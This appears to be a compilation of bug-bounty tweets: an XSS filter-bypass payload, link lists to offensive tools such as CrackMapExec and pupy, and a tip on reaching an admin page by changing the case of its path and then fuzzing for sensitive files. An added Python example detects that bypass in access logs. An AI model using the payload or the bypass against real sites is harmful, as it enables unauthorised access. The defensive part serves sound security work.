[XSS] #BugBountyTips
Found a weird XSS filter bypass using this payload:
<style/><img src="z'z</style><script/z>alert(1)</script>">
#BugBounty @XssPayloads
#Pentest #bugbounty
https://github.com/k8gege/K8tools
https://github.com/mbechler/marshalsec
https://github.com/lanjelot/patator
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/evilcos/xssor2
https://github.com/cujanovic/SSRF-Testing
https://github.com/LandGrey/pydictor
https://github.com/m0rtem/CloudFail
https://github.com/1N3/Findsploit
https://github.com/rewardone/OSCPRepo
#bugbountytips
#bugbounty Tools
Scanners-Box
https://t.co/Kl8KyFqCtl
K8tools
https://t.co/Vc9Nm6AhLt
arachni
https://t.co/jyhK1yNlkH
Osmedeus
https://t.co/4maQSFojzs
Findsploit
https://t.co/kgO1lJfwRK
StaCoAn
https://t.co/er4opW1l5J
#bugbountytips
#pentest
https://github.com/jivoi/pentest
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec
Red-Teaming-Toolkit
https://github.com/infosecn1nja/Red-Teaming-Toolkit
pwndb
https://github.com/davidtavarez/pwndb
pupy
https://github.com/n1nj4sec/pupy
Red-Team-Infrastructure-Wiki
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
Cheatsheet-God
https://github.com/OlivierLaflamme/Cheatsheet-God
#bugbountytips
Tip of the day ...
http://sub.target.com/web/admin/ => 302 redirect to main domain
http://sub.target.com/web/aDmiN/ => 200 ok admin login page
http://sub.target.com/web/aDmiN/FUZZ => $Critical sensitive files$
#bugbountytip #bugbountytips #Bugbounty
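
A defender's view of the tip above, as an added example that is not part of the original post: the 302 comes from a rule that compares the path byte for byte, while the backend resolves it case-insensitively. The sketch puts that weak rule beside a canonicalising one and scans access-log lines for requests that got past the weak rule; the protected prefix, the log format and the sample lines are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Assumption: the prefix the deployment intends to keep behind the redirect.
PROTECTED_PREFIXES = ("/web/admin/",)

def canonical(path: str) -> str:
    """Decode, collapse dot segments and fold case before any access decision."""
    decoded = unquote(urlsplit(path).path)
    norm = posixpath.normpath(decoded)
    if decoded.endswith("/") and norm != "/":
        norm += "/"  # normpath drops the trailing slash; keep it for prefix matching
    return norm.casefold()

def naive_rule_matches(path: str) -> bool:
    """The weak check: byte-for-byte prefix comparison on the raw path."""
    return path.startswith(PROTECTED_PREFIXES)

def hardened_rule_matches(path: str) -> bool:
    """The corrected check: compare the canonical form against the prefix."""
    return canonical(path).startswith(PROTECTED_PREFIXES)

def find_rule_bypasses(log_lines):
    """Return (path, status) for 2xx responses on protected paths the naive rule missed."""
    hits = []
    for line in log_lines:
        _method, path, status = line.split()
        missed = hardened_rule_matches(path) and not naive_rule_matches(path)
        if missed and status.startswith("2"):
            hits.append((path, int(status)))
    return hits

# Constructed sample log lines (method, path, status), modelled on the tip above.
SAMPLE_LOG = [
    "GET /web/admin/ 302",
    "GET /web/aDmiN/ 200",
    "GET /web/aDmiN/backup.zip 200",   # constructed file name
    "GET /web/public/ 200",
    "GET /web/ADMIN/missing 404",
]

if __name__ == "__main__":
    for path, status in find_rule_bypasses(SAMPLE_LOG):
        print(f"{status} {path}  served past the case-sensitive rule")
```

The same canonical form should drive both the redirect rule and the backend's authorization check, so the two layers cannot disagree about which resource a path names.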